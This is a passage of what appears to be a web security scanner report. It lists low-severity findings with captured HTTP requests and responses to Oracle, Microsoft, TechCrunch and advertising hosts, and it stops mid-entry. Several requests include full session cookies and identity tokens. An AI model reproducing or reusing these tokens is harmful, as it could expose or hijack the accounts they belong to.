Cookie: s_cc=true; s_nr=1298762779613; gpv_p24=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24; gpw_e24=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253DDialogue%252520Welcome%252520Page%25253AWWMK09049794MP%25253A6804803%25253A8810727%25253A24%2526pidt%253D1%2526oid%253Djavascript%25253AProfileLpOpen%252528%252529%25253B%2526ot%253DA; JSESSIONID=GQ6cNpMPN5vvxtKdGlKhGZKFrGh7Tq47Sx2RRJR9T0mQQ1qr6ww1!-1135232050!957286243; BIGipServermktap-myprofile-endusr_http_pool=2953613965.26910.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:23:29 GMT
Accept-Ranges: bytes
Last-Modified: Thu, 29 Oct 2009 05:53:52 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=3600+360;age=159;ecid=167047631870118073,0)
Content-Length: 908

.PNG
.
...IHDR...w...........&.....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx....Q*A.......d .H....H.b.b.d f..`.....p....a.=M    ..{..........g.t..].Sd...]...D..d.3.............|.....
...[SNIP]...

15.35. https://myprofile.oracle.com/EndUser/jscripts/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myprofile.oracle.com
Path:   /EndUser/jscripts/s_code.js

Request

GET /EndUser/jscripts/s_code.js HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http%3A%2F%2Flandingpad.oracle.com%2Fwebapps%2Fdialogue%2Fdlgpage.jsp%3Fp_dlg_id%3D8810727%26src%3D6804803%26act%3D24%26id1%3D8810728%26id2%3D8810730%26r1%3D-1%26r2%3D-1%26r0%3D-1%26pe%3Dnull%26pr%3D365.0%26pt%3DY%26pd%3DY%26xs%3D6804803%26xa%3D24%26pu%3DNull%26po%3DWWMK09049794MP%26ps%3DN%26p_ext%3DY%26p_tm%3DNull
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762779613; gpv_p24=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24; gpw_e24=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253DDialogue%252520Welcome%252520Page%25253AWWMK09049794MP%25253A6804803%25253A8810727%25253A24%2526pidt%253D1%2526oid%253Djavascript%25253AProfileLpOpen%252528%252529%25253B%2526ot%253DA; JSESSIONID=GQ6cNpMPN5vvxtKdGlKhGZKFrGh7Tq47Sx2RRJR9T0mQQ1qr6ww1!-1135232050!957286243; BIGipServermktap-myprofile-endusr_http_pool=2953613965.26910.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:24:16 GMT
Accept-Ranges: bytes
Last-Modified: Tue, 06 Jul 2010 23:59:08 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=113;ecid=167047614690248879,0)
Content-Length: 30025

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...

15.36. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myprofile.oracle.com
Path:   /EndUser/jscripts/s_code_profile.js

Request

GET /EndUser/jscripts/s_code_profile.js HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http%3A%2F%2Flandingpad.oracle.com%2Fwebapps%2Fdialogue%2Fdlgpage.jsp%3Fp_dlg_id%3D8810727%26src%3D6804803%26act%3D24%26id1%3D8810728%26id2%3D8810730%26r1%3D-1%26r2%3D-1%26r0%3D-1%26pe%3Dnull%26pr%3D365.0%26pt%3DY%26pd%3DY%26xs%3D6804803%26xa%3D24%26pu%3DNull%26po%3DWWMK09049794MP%26ps%3DN%26p_ext%3DY%26p_tm%3DNull
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762779613; gpv_p24=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24; gpw_e24=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253DDialogue%252520Welcome%252520Page%25253AWWMK09049794MP%25253A6804803%25253A8810727%25253A24%2526pidt%253D1%2526oid%253Djavascript%25253AProfileLpOpen%252528%252529%25253B%2526ot%253DA; JSESSIONID=GQ6cNpMPN5vvxtKdGlKhGZKFrGh7Tq47Sx2RRJR9T0mQQ1qr6ww1!-1135232050!957286243; BIGipServermktap-myprofile-endusr_http_pool=2953613965.26910.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:24:07 GMT
Accept-Ranges: bytes
Last-Modified: Wed, 14 Jul 2010 22:00:08 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=122;ecid=167047606100314287,0)
Content-Length: 1366

/* Setting the s_account */
function s_setAccount(){

var s_account="";

var curUrl = location.href;

if(curUrl.indexOf(":7101") != -1 || curUrl.indexOf("-mktad") != -1 || curUrl.index
...[SNIP]...

15.37. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=1137&ref2=elqNone&tzo=360&ms=748 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:00:08 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

15.38. http://odb.outbrain.com/utils/ping.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/ping.html

Request

GET /utils/ping.html?random=0.42985726799815893 HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://ioerror.us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=0e0ed3f9-f76f-4651-916d-b47532550304; _lvd2="p47tkLgO+tdtgtEB03I2oA=="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="; _lvs2="23sEltQMc/A="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
ETag: W/"158-1298196846000"
Last-Modified: Sun, 20 Feb 2011 10:14:06 GMT
Content-Type: text/html
Content-Length: 158
Date: Sat, 26 Feb 2011 23:19:21 GMT

<html>
   <head>
       <META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
       <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
   </head>
   <body>
   </body>
</html>

15.39. http://products.wolframalpha.com/api/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.wolframalpha.com
Path:   /api/

Request

GET /api/ HTTP/1.1
Host: products.wolframalpha.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WR_SID=173.193.214.243.1298948109851419; __utmz=171643174.1298948189.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __unam=55c5e66-12e6f587d90-19185b37-1; WolframHomepageVisits=1; __utma=171643174.1847852404.1298944705.1298944705.1298948189.2; __utmc=171643174; __utmb=171643174.2.10.1298948189

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 03:14:24 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 23121

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/x
...[SNIP]...

15.40. https://profile.microsoft.com/RegSysProfileCenter/history.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://profile.microsoft.com
Path:   /RegSysProfileCenter/history.html

Request

GET /RegSysProfileCenter/history.html?back HTTP/1.1
Host: profile.microsoft.com
Connection: keep-alive
Referer: https://profile.microsoft.com/RegSysProfileCenter/wizard.aspx?wizid=345281f9-6588-4888-820f-2695af056d4f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; WT_NVR_RU=0=technet:1=:2=; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; omniID=1297806178674_91c6_3334_928f_a989ebdd6d47; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi600017030E02h7030E; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1297804156157:ss=1297803748324; MicrosoftSessionCookie=Microsoft.CookieId=78d5c863-4552-4f86-b8c5-539d334c9fb7&Microsoft.CreationDate=02/27/2011 19:20:26&Microsoft.LastVisitDate=02/27/2011 19:20:26&Microsoft.NumberOfVisits=1&SessionCookie.Id=64CAD3A97B748BF6F74BBEC85B0BED3C; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=02/27/2011 19:20:26&Microsoft.VisitStartDate=02/27/2011 19:20:26&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=102861a9-5b1d-4b0c-8d49-9f073ca27715&Microsoft.NumberOfVisits=12&Microsoft.IdentityToken=z+TZ1vmNeLZxVML9U7W/lYO7k5d3HRkU0eDm4WS6Uiw+xSEwHKaM7u8zbu/2nQOrPi294TKV4roHALSLk/tSHgE2wKOsGiD40I8BozviL2QQHYemu8KnYFL5OLCF6pWu5PaGDstxStMCl3xutcDSPRMP/4ltTk9rRle9HNFHbnV8Q9r7uAWoYXz7+gb3Wjsjnk4TKCvuzGUhiDkKRxLJKWljJpRRRjrqZXBRWGMv9mpn9TKpo6vJtmJyZPqme3pMmfjWYwzZRRkvb8wTFOGVrfWIaLskIrR5Ugo8KI7kvJQOM5ILONq0+E3JCoMfBYTX03Bw+cR9BY54Cp8Obs6OeZ4O7XP45o7jNldxdSuGXxNWPEezoqN89rbWK/CsZwc+swvCrSVgcXDUGoj19SfPbyTsbXUsHdOVTI3ttXpDzBPnprkUrNI7/Cm5kJV+9Y3RKwoMuGibeo+d+KUsSYN9aKtHBSVsS3impdy9bktA5zg6S1uJEzjuKwseS5y24uCbk1wwof1yHR0A09vQQuQFPYRzFWop8oyfy/rrYR2bo3k=&Microsoft.MicrosoftId=0651-2120-0297-7612; vc=vci=1; RegSysReturnUrl=https://profile.microsoft.com/RegSysProfileCenter/wizard.aspx?wizid=345281f9-6588-4888-820f-2695af056d4f

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 08 Oct 2010 18:12:52 GMT
Accept-Ranges: bytes
ETag: "02ad6c1467cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 27 Feb 2011 19:20:30 GMT
Content-Length: 405

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...

15.41. http://seg.sharethis.com/getSegment.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Request

GET /getSegment.php?fpc=30dea60-12e64e877f0-4b740973-1&purl=null&jsref= HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.5c108f5ecedf280ce5fe5e8db7e38332.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CszLBk1bK3ITLgrkJKQWAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Sun, 27 Feb 2011 02:18:17 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 2242


           <html>
           <head><title>ShareThis Segmenter</title></head>
           <body>
           
                           <script type="text/javascript">
                   var google_conversion_id = 1036609180;
                   var google_conversion_language = "en
...[SNIP]...

15.42. http://statistics.wibiya.com/SetToolbarLoad.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statistics.wibiya.com
Path:   /SetToolbarLoad.php

Request

GET /SetToolbarLoad.php?toolbarId=488383&referer=http://www.companypond.com/atlanticays HTTP/1.1
Host: statistics.wibiya.com
Proxy-Connection: keep-alive
Referer: http://www.atlanticyachtandship.com/about_us.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:52:18 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny6 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 165

<script type="text/javascript">
_qoptions={qacct:"p-f1g4ElEQKd68M"};
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>

15.43. http://tags.bluekai.com/site/918  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/918

Request

GET /site/918?ret=html&phint=fa%3Dit&phint=ind%3Dbusinessservices&limit=3&r=29594071 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://js.bizographics.com/support/partner.html?pid=221&u=fa:it,ind:businessservices,slots:3
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99W4pVANemJaB; bklc=4d68470c; bk=XC8csSSI5QJh4f95; bkc=KJh56n+mxAWxOrOdmHE9muRXQ5UYY6Q/RsvAyRgKyGjnGG62Gu/CaOjsiwc09kuD5OSs6OW4yORvxZBOxSi56zy8mNFLqgfLpedj7Rj9nV1xU56NeR9orKn8JGlRgycxgyajhh7wIbgtNFmAgeltpwwW2fxa9tYlSz4ZKdcoYUO51aClWFXDGzpNTkAmZ1IOCKwpAEqUiNwD40ySUajqLxIKFbNtdxcv7YzIHgHKevpMo8ntk2UZwBKzJpbxytKeM6gi7m4cAFqvS7mISXTUnIAdGiUxmW+XWVopFECwflt7Kq48PMB9fX2q3XlpUcmdmW+87tdd8Mht5bC5ctMpv4TaQ8+N6Q==; bko=KJ0fyXF9ymZKTzFv1/AByrJQAmHMRcYyEwHkRjYaL+QRP/c3K/Y0q9y96QGcQy==; bkst=KJy5pgav96WxOr9o9QWFyzJuusVfLeLpKf+qHMAEYsFCVPQo+l+lYRZzvvCQnjnshd9jfc6YcXamuhdOpD6Ndwdc19wTl91T9k7gHgsgHzOvYojmi3YhWqZEZClcta9XozGwTYF8/Eh6ZIft34+jUbUGn6DcxvC0hX0A7BWZNXqRMffKp0eBb2+r2NkwiSHhuiqYhaRCbZN4FtufjfMV9zAGxxb+1JDkQ5ysDVLA+vlmAzBF4dG2ID1TZHjkD5MtzqbTnezIcaXFfLbKNh5Gk3wjvgcJss9WL8rTrF5C37h8dCtedyKnaEyt; bkw5=KJhNpE6vyA9xCraFBNsEZ/ORVBCjvaQo1DD6IJ1D9qt9of9xWu02Q/iBKCogMt1HgJNkOh/kBgFewryf+xs95QicgMgi9OYy7zzBb/j9RG4/CcGfH/eWNUiBxSzN94gA3KlMYKUfuwI1MXYxaBOuPuwJtp6c9CLklJH/8Ao6qPLx9tLV+V6NpVLZNpnlHnUZnJ4vN88VxuHnyfrEfWQLagl4j0IV6hnH8VVJuYdgYUxVBJ+k+z+4szVdBzANfHIjA027

Response

HTTP/1.0 200 OK
Date: Sun, 27 Feb 2011 02:18:16 GMT
Set-Cookie: bklc=4d69b468; expires=Tue, 01-Mar-2011 02:18:16 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=anV393SI5QJh4f95; expires=Fri, 26-Aug-2011 02:18:16 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56e2nxpWDO4YEwostfyZ5cJlu4Qsn+OUWnMoNfIeuvrMinATazU9xa4cwaIMAt1NOoJFT9PhNvYTme3Vp2NHrUtbsWcfA8C0uRx36iQfjfkcc9Hivs8clkgey4xvz+GYur/ePjqGRIq5owRkXLta2cjk2bZ1oExq92N5dlAdpUntt97ugeodfrU231mSXI3A1MWq9SIeBztFm3y+04Njptsftao8sdFeVfxLR16X20tE5m4M9PlUg5tdBFBe1D6dabSlez0Blm4Jkl4gBVp1dBwwPRdZwq9pLgm4Ku368gbf/KhIkffeub0xTZUFig5AUZF4PJzkfK4QlXIie1IFtyJ3fIQ27DlS5; expires=Fri, 26-Aug-2011 02:18:16 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Mon, 28-Feb-2011 02:18:16 GMT; path=/; domain=.bluekai.com
BK-Server: a96f
Content-Length: 77
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">

</div>

</body>
</html>

15.44. http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://techcrunch.com
Path:   /2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/

Request

GET /2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/?cf_action=sync_comments&post_id=276072 HTTP/1.1
Host: techcrunch.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=75736080.1298773822.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-228159185-1298773822293; __utma=75736080.1073528764.1298773822.1298773822.1298773822.1; __utmc=75736080; __utmb=75736080.1.10.1298773822; s_pers=%20s_getnr%3D1298773823354-New%7C1361845823354%3B%20s_nrgvo%3DNew%7C1361845823357%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; _chartbeat2=9ty1isxoua91z7jc

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 27 Feb 2011 02:32:39 GMT
Content-Type: text/html
Connection: close
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Vary: Accept-Encoding
Content-Length: 2

OK

15.45. http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://techcrunch.com
Path:   /wp-content/themes/vip/tctechcrunch/_uac/adpage.html

Request

GET /wp-content/themes/vip/tctechcrunch/_uac/adpage.html HTTP/1.1
Host: techcrunch.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 27 Feb 2011 02:30:34 GMT
Content-Type: text/html
Connection: close
Accept-Ranges: bytes
ETag: "480-4d49c3bc-a7c281"
Last-Modified: Wed, 02 Feb 2011 20:51:08 GMT
Vary: Accept-Encoding
Content-Length: 1152

<html>
<head>
<script type='text/javascript'>
var dom=location.hash
if (dom!=''){
dom=dom.substr(1)
document.domain=dom
}

function adsPageOnL(){
var adFr=window.frameElement
if (adFr){

...[SNIP]...

15.46. http://tinyurl.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tinyurl.com
Path:   /

Request

GET / HTTP/1.1
Host: tinyurl.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=tinyurl
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Sun, 27 Feb 2011 16:37:18 GMT
Server: TinyURL/1.6
Content-Length: 9381

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>TinyURL.com - shorten that long URL into a tiny URL</title>
   <base href="http://tinyurl.com/">
   <link rel="sho
...[SNIP]...

15.47. http://REDACTED/CNT/iview/302784236/direct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://REDACTED
Path:   /CNT/iview/302784236/direct

Request

GET /CNT/iview/302784236/direct;wi.125;hi.125/01/773834229?click=http://at.atwola.com/adlink/5113/1838221/0/6/AdId=1473155;BnId=1;itime=773834229;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311143;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link= HTTP/1.1
Host: REDACTED
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=FA3AE6176FAC4414AD6FC26C726B4B15; AA002=1297806090-11017856; ach00=9cc2/1c4e; ach01=158f3cc/1c4e/2ac3a8d/9cc2/4d6263ca

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Date: Sun, 27 Feb 2011 02:31:17 GMT
Connection: close
Content-Length: 551

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/203665251/302784236/direct;wi.125;hi.125/01" onclick="(new Image).src='http://at.atwola.com/adlink/5113/1838221/0/6/AdId=14731
...[SNIP]...

15.48. http://REDACTED/iaction/00asup_HomePortal_1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://REDACTED
Path:   /iaction/00asup_HomePortal_1

Request

GET /iaction/00asup_HomePortal_1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: REDACTED

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 648
Content-Type: text/html
Expires: 0
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001298912249-11856381; expires=Wednesday, 27-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=6305C1A54774467CBBD6A987A4642EF2; expires=Friday, 16-Sep-2011 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Mon, 28 Feb 2011 16:57:29 GMT

<html><body><img src="http://ec.redcated/images/pixel.gif" width="1" height="1" border="0" /><img src="http://ad.bizo.com/pixel?id=562914&t=2" width="1" height="1" border="0" /><img src="http://ads.c
...[SNIP]...

15.49. http://REDACTED/iaction/adoapn_AppNexusDemoActionTag_1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://REDACTED
Path:   /iaction/adoapn_AppNexusDemoActionTag_1

Request

GET /iaction/adoapn_AppNexusDemoActionTag_1 HTTP/1.1
Host: REDACTED
Proxy-Connection: keep-alive
